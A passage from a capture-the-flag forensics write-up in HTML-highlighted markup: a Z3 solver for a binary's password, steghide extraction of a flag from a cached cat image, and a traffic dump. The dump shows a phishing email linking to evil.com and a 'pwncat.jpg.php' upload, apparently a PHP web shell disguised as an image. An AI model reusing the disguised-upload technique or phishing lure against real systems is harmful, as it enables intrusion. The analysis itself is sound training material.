#EFF\">sol<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">z3_solver<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">model<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()<\/span>\n\n<span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">20<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n     <span class=\"n\" style=\"background: #263238;color: #EFF\">flag<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">+=<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">chr<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">int<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nb\" style=\"background: #263238;color: #82AAFF\">str<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">sol<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]])))<\/span>\n\n<span class=\"nb\" style=\"background: #263238;color: #82AAFF\">print<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">flag<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n<\/pre><\/div>\n\n\n\n<p>Now <strong>Z3<\/strong> can try to find a string that satisfies all rules:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>python solve.py\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">GetThisSATisfaction!<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>.\/binary GetThisSATisfaction!\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Nice!<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">usd{getThisSATisfaction}<\/span>\n<\/pre><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-8-stegano-\/-important-cat\"><\/a>Flag 8: Stegano \/ important cat<\/h4>\n\n\n\n<p>When we obtained <a href=\"#flag-7-deleted-email\">Flag 7<\/a> we recovered some <em>SMTP<\/em> traffic. Within it, we can find another mail asking the\nreceiver to urgently open an image of an important cat. <\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>--------------k4AReqfas8Rd90gqnwrSa85a--\nContent-Type: text\/plain; charset=UTF-8; format=flowed\nContent-Transfer-Encoding: 7bit\n\nJack,\n\nI've found this Image of a cat. It's so funny, make sure to INSPECT it NOW!\nhttp:\/\/evil.com\/cat.jpg\n<\/pre><\/div>\n\n\n\n<p>Since firefox was used earlier, we can try to check whether this image was cached by the browser.<\/p>\n\n\n\n<p>The Firefox cache is located under <strong>\/mnt\/home\/jim\/.cache\/mozilla\/firefox\/.default-release\/cache2\/entries\/<\/strong>. Inside this folder we find the image <strong>75EEE736F281F5693206FCC7026B0C4F0E1AE0C0 <\/strong>of a cat. We can check whether hidden information is contained within the image using <strong>steghide<\/strong>. Indeed, we find a flag:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>steghide extract -sf 75EEE736F281F5693206FCC7026B0C4F0E1AE0C0 -xf out\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>cat out\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Meet in 20min. 33.3926515013514, -117.2347743334174. L<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">usd{7df5e7013803c097abbc}<\/span>\n<\/pre><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-9-weak-encryption\"><\/a>Flag 9: Weak Encryption<\/h4>\n\n\n\n<p>When we obtained <a href=\"#flag-7-deleted-email\">Flag 7<\/a>, there was another file recovered we did not look at so far: <strong>f0253904.h<\/strong>.\nThis file contains some dumped network traffic: <\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">No<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Time<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Source<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">                <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Destination<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Length<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.054457546<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">             <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">112.0.1.12<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">876<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">POST<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">JPEG<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">JFIF<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">image<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">Hypertext<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Transfer<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">POST<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.1<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">MIME<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Multipart<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Media<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Encapsulation<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Type<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">multipart<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">form<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Boundary<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"---------------------------307417106128493101451432141175\"<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Type<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">multipart<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">form<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">First<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">boundary<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">----------------------------<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">-307417106128493101451432141175<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Encapsulated<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">multipart<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">part<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">image<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">jpeg<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Content<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Disposition<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">form<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">name<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"file\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">filename<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"pwncat.jpg.php\"<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Content<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Type<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">image<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">jpeg<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">JPEG<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">File<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Interchange<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Format<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Image<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">No<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Time<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Source<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">                <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Destination<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">           <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Length<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Info<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.058823489<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">112.0.1.12<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">        <\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">92.117.32.15<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">             <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">502<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.0<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">200<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">OK<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">text<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">html<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"n\" style=\"background: #263238;color: #EFF\">Hypertext<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Transfer<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Protocol<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #F78C6C\">1.0<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">200<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">OK<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">r<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">HTTP<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">Line<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">based<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">text<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">text<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">html<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">7<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">lines<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;!<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">DOCTYPE<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">html<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">PUBLIC<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN\"<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">html<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">title<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Upload<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Result<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Page<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">title<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">body<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">h2<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Upload<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Result<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Page<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">h2<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">    <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">hr<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">\\<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">truncated<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">strong<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Success<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">:&lt;\/<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">strong<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">File<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">'<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">home<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">user<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">uploads<\/span><span class=\"o\" 